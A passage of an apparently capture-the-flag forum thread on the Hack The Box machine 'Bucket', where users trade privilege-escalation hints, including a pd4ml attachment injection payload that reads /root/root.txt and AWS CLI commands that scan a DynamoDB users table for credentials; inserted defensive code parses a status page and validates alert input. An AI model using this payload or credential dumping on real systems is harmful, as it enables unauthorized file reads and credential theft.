TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#37
Any ideas for privesc root?
I know there is a docker and I think something needs to be done with it, but roy is not a member of the docker group, so I don't think we can exploit GTFOBins in this case.
#38
(October 18, 2020 at 05:33 PM)Kali76 Wrote: Any ideas for privesc root?
I know there is a docker and I think something needs to be done with it, but roy is not a member of the docker group, so I don't think we can exploit GTFOBins in this case.

I'm stuck too. There is a suspicious process running... maybe we should look.
#39
Any thoughts on privesc? Enumerated and didn't find much - looks like someone was trying to exploit with lxd.
I saw a bunch of files in /var regarding aws sdk and other vendor files. I'm wondering if we do something with project dir in home
#40
(October 18, 2020 at 06:24 PM)southerndarkness Wrote: Any thoughts on privesc? Enumerated and didn't find much - looks like someone was trying to exploit with lxd.
I saw a bunch of files in /var regarding aws sdk and other vendor files. I'm wondering if we do something with project dir in home

It probably has to do with /var/www/bucket-app, look at the code in index.php...

I forwarded 127.0.0.1:8000 with ssh, and got a response from that application...

Also tried POSTing "action=get_alerts" to that page and got an empty response...

Have to think a little more about it...
#41
(October 18, 2020 at 06:42 PM)raidmail2020 Wrote:
(October 18, 2020 at 06:24 PM)southerndarkness Wrote: Any thoughts on privesc? Enumerated and didn't find much - looks like someone was trying to exploit with lxd.
I saw a bunch of files in /var regarding aws sdk and other vendor files. I'm wondering if we do something with project dir in home

It probably has to do with /var/www/bucket-app, look at the code in index.php...

I forwarded 127.0.0.1:8000 with ssh, and got a response from that application...

Also tried POSTing "action=get_alerts" to that page and got an empty response...

Have to think a little more about it...

Ahhh port forwarded now and checking out the bucket application site. 👀

It seems if we post to ?actions we connect to the db on 4566 and dump items from the alerts table into a pdf? Strange.
#42
http://127.0.0.1:8000/server-status/

```
Apache Server Status for 127.0.0.1 (via 127.0.0.1)

Server Version: Apache/2.4.41 (Ubuntu) mpm-itk/2.4.7-04
Server MPM: prefork
Server Built: 2020-08-12T19:46:17

Current Time: Sunday, 18-Oct-2020 18:07:35 UTC
Restart Time: Sunday, 18-Oct-2020 17:29:57 UTC
Parent Server Config. Generation: 1
Parent Server MPM Generation: 0
Server uptime: 37 minutes 37 seconds
Server load: 6.40 3.16 1.29
Total accesses: 27670 - Total Traffic: 16.6 MB - Total Duration: 5587651
CPU Usage: u.16 s.42 cu3.82 cs7.12 - .51% CPU load
12.3 requests/sec - 7.5 kB/second - 630 B/request - 201.939 ms/request
118 requests currently being processed, 18 idle workers

KR_WWWWWKWWWWWWWWWW__WWWWWWWWWWWWWWWWWWWWWWWWWRWWWWWWWWWWWWWWWK_
_WKWWWWWWWWW_WWWWWWWKWWWWWW_WWRWWWWWWWWWKWWWWWWW_RR_RK__R_KK_CK_
__KK__KK..............

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process
Srv PID Acc M CPU SS Req Dur Conn Child Slot Client Protocol VHost Request
Srv Child Server number - generation
PID OS process ID
Acc Number of accesses this connection / this child / this slot
M Mode of operation
CPU CPU usage, number of seconds
SS Seconds since beginning of most recent request
Req Milliseconds required to process most recent request
Dur Sum of milliseconds required to process all requests
Conn Kilobytes transferred this connection
Child Megabytes transferred this child
Slot Total megabytes transferred this slot
Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 8000
```

```
dirsearch -u http://127.0.0.1:8000 -e *
[14:05:48] 200 - 63B - /composer.json
[14:05:48] 200 - 20KB - /composer.lock
[14:05:56] 301 - 313B - /files -> http://127.0.0.1:8000/files/
[14:05:56] 200 - 738B - /files/
[14:06:00] 200 - 16KB - /index.php/login/
[14:06:01] 200 - 16KB - /index.php
[14:06:25] 200 - 31KB - /server-status/
[14:06:25] 200 - 31KB - /server-status
[14:06:34] 200 - 0B - /vendor/autoload.php
[14:06:34] 200 - 0B - /vendor/composer/ClassLoader.php
[14:06:34] 200 - 0B - /vendor/composer/autoload_real.php
[14:06:34] 200 - 0B - /vendor/composer/autoload_static.php
[14:06:34] 200 - 18KB - /vendor/composer/installed.json
[14:06:34] 200 - 0B - /vendor/composer/autoload_files.php
[14:06:34] 200 - 1KB - /vendor/composer/LICENSE
[14:06:34] 200 - 0B - /vendor/composer/autoload_psr4.php
[14:06:34] 200 - 0B - /vendor/composer/autoload_namespaces.php
[14:06:34] 200 - 0B - /vendor/composer/autoload_classmap.php
```
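The mod_status page posted above lists one row per worker with the client address, vhost and request line. As an added example (not code from the thread), here is a small reader for that table that summarizes which clients are hitting which vhosts and paths and flags the status page itself being served to a non-loopback client; the rows in it are constructed in the dump's column order, not copied from the post.

```python
"""Added example, not from the thread: a reader for the per-worker table of
an Apache mod_status page. Column order follows the dump above:
Srv PID Acc M CPU SS Req Dur Conn Child Slot Client Protocol VHost Request."""
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample rows (client addresses from the 198.51.100.0/24
# documentation range); header and legend lines are included to show that
# the parser skips them.
SAMPLE_STATUS = """\
Srv PID Acc M CPU SS Req Dur Conn Child Slot Client Protocol VHost Request
0-0 959 1/183/183 K 0.00 0 1 4598 0.5 0.18 0.18 198.51.100.7 http/1.1 127.0.1.1:80 GET /Terms.txt HTTP/1.1
1-0 960 0/558/558 W 0.00 0 0 3265 0.0 0.34 0.34 198.51.100.7 http/1.1 127.0.1.1:80 GET /car.cnf HTTP/1.1
2-0 961 0/12/12 W 0.00 3 0 100 0.0 0.01 0.01 198.51.100.9 http/1.1 s3.bucket.htb:80 GET /adserver/ads HTTP/1.1
3-0 962 0/9/9 R 0.00 0 0 16 0.0 0.01 0.01 127.0.0.1 http/1.1 localhost:8000 GET /server-status/ HTTP/1.1
4-0 963 0/3/3 _ 0.00 0 0 8 0.0 0.00 0.00 198.51.100.9 http/1.1 localhost:8000 GET /server-status HTTP/1.1
Srv Child Server number - generation
PID OS process ID
"""


def parse_rows(text):
    """Parse worker rows; header, legend and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 14)  # 14 fixed columns + the request line
        if len(parts) != 15 or "-" not in parts[0] or not parts[1].isdigit():
            continue
        request = parts[14].split()
        rows.append({
            "mode": parts[3], "client": parts[11], "vhost": parts[13],
            "method": request[0] if request else "",
            "path": request[1] if len(request) > 1 else "",
        })
    return rows


def summarize_clients(rows):
    """Per client: request count plus the vhosts and paths touched."""
    summary = defaultdict(lambda: {"requests": 0, "vhosts": set(), "paths": set()})
    for row in rows:
        entry = summary[row["client"]]
        entry["requests"] += 1
        entry["vhosts"].add(row["vhost"])
        entry["paths"].add(row["path"])
    return dict(summary)


def _is_loopback(client):
    try:
        return ip_address(client).is_loopback
    except ValueError:  # hostname (HostnameLookups on) or malformed field
        return False


def remote_status_hits(rows):
    """Rows where /server-status was served to a client that is not loopback."""
    return [r for r in rows
            if r["path"].startswith("/server-status") and not _is_loopback(r["client"])]


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_STATUS)
    for client, entry in summarize_clients(rows).items():
        print(client, entry["requests"], sorted(entry["vhosts"]), len(entry["paths"]))
    print("status page reached from outside:", [r["client"] for r in remote_status_hits(rows)])
```

A status page that leaks vhost names and client addresses like this should be restricted with `Require local` (or an explicit allow-list) inside the `<Location /server-status>` block.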
#43
We need to trigger a POST with:

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                    "title": {"S": "Ransomware"},
                    "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
                }
            }
        }
    ]
}

Something like that; I'm trying to make it work.
#44
xxxyz Wrote: We need to trigger a POST with:

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                    "title": {"S": "Ransomware"},
                    "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
                }
            }
        }
    ]
}

Something like that; I'm trying to make it work.

I don't understand, how do you make a POST request? With Burp? Where did you get these parameters?
#45
(October 18, 2020 at 08:47 PM)Kali76 Wrote:
xxxyz Wrote: We need to trigger a POST with:

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                    "title": {"S": "Ransomware"},
                    "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
                }
            }
        }
    ]
}

Something like that; I'm trying to make it work.

I don't understand, how do you make a POST request? With Burp? Where did you get these parameters?


curl -X POST 127.0.0.1:8000 ...
#46
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger a POST with:

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                    "title": {"S": "Ransomware"},
                    "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
                }
            }
        }
    ]
}

Something like that; I'm trying to make it work.

Any luck? I tried posting with that but got nothing :(
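The payload quoted in the last few posts works because alert text written to the alerts table is later rendered into a PDF as raw HTML, so pd4ml's own `<pd4ml:attachment>` tag and a `file://` URI are interpreted by the converter. As an added example (not code from the thread or from the Bucket app), the following validates a BatchWriteItem-style payload of that shape before it is stored and escapes alert text before a converter sees it; it assumes the `{"alerts": [{"PutRequest": {"Item": {...}}}]}` shape the poster shows with DynamoDB attribute values (`{"S": ...}`, `{"M": ...}`, `{"L": ...}`), and the function names are hypothetical.

```python
"""Added example, not code from the thread or the Bucket app: reject or
neutralize pd4ml markup and non-http URI schemes in alert items before they
are stored or rendered to PDF. Assumes the BatchWriteItem request shape
quoted in the thread; names here are hypothetical."""
import html
import json
import re

# pd4ml interprets its own <pd4ml:...> tags (e.g. pd4ml:attachment) while
# converting HTML to PDF, so user text must never reach it as raw markup.
PD4ML_TAG = re.compile(r"<\s*/?\s*pd4ml\s*:", re.IGNORECASE)
# Any URI scheme other than http/https (file: in the quoted payload) can
# make the converter read from the rendering host itself.
URI_SCHEME = re.compile(r"\b([a-z][a-z0-9+.\-]*):/{2}", re.IGNORECASE)
ALLOWED_SCHEMES = {"http", "https"}

# The payload quoted in the thread, used here as sample input.
SAMPLE_PAYLOAD = r'''{
  "alerts": [{"PutRequest": {"Item": {
    "title": {"S": "Ransomware"},
    "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
  }}}]
}'''


def string_attributes(item, prefix=""):
    """Yield (path, value) for every string attribute in a DynamoDB Item,
    descending into map (M) and list (L) attributes."""
    for name, attr in item.items():
        if "S" in attr:
            yield prefix + name, attr["S"]
        elif "M" in attr:
            yield from string_attributes(attr["M"], prefix + name + ".")
        elif "L" in attr:
            for i, element in enumerate(attr["L"]):
                yield from string_attributes({f"{name}[{i}]": element}, prefix)


def check_batch_write(payload, table="alerts"):
    """Return (attribute path, reason) findings for every risky string."""
    findings = []
    for request in payload.get(table, []):
        item = request.get("PutRequest", {}).get("Item", {})
        for path, value in string_attributes(item):
            if PD4ML_TAG.search(value):
                findings.append((path, "pd4ml markup"))
            for scheme in URI_SCHEME.findall(value):
                if scheme.lower() not in ALLOWED_SCHEMES:
                    findings.append((path, f"non-http URI scheme '{scheme.lower()}'"))
    return findings


def render_safe(text):
    """Escape alert text so the converter sees literal characters, not tags."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    payload = json.loads(SAMPLE_PAYLOAD)
    for path, reason in check_batch_write(payload):
        print(f"reject {path}: {reason}")
    print(render_safe(payload["alerts"][0]["PutRequest"]["Item"]["data"]["S"]))
```

The check goes beyond the quoted payload by walking nested map and list attributes and flagging every non-http scheme, not only `file:`.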
#47
(October 18, 2020 at 11:10 AM)as12sd12fdg3 Wrote:
(October 18, 2020 at 10:15 AM)VillainD Wrote:
(October 18, 2020 at 10:04 AM)Ro0ted Wrote:
(October 18, 2020 at 09:51 AM)VillainD Wrote: aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ | jq -r .

This will give you those creds.

Great man, thank you. Can you explain to me the steps to find this command?

First, list all the tables using

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/

https://docs.aws.amazon.com/cli/latest/r...l#examples

Then I was searching how to get those table contents, and dynamodb has a scan option: "The Scan operation returns one or more items and item attributes by accessing every item in a table or a secondary index."

https://docs.aws.amazon.com/cli/latest/r...l#examples

Based on the examples I used this command, since we already know the table's name:

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/

And the "--endpoint-url" I got from here:

https://stackoverflow.com/questions/6098...ing-tables

Got this error:
Unable to locate credentials. You can configure credentials by running "aws configure".
but I don't find any credentials.

Go to http://s3.bucket.htb/shell
Now you have something.
Use the aws configure command and paste the domain name.
#48
Ok but I don't think you have permission to read root.txt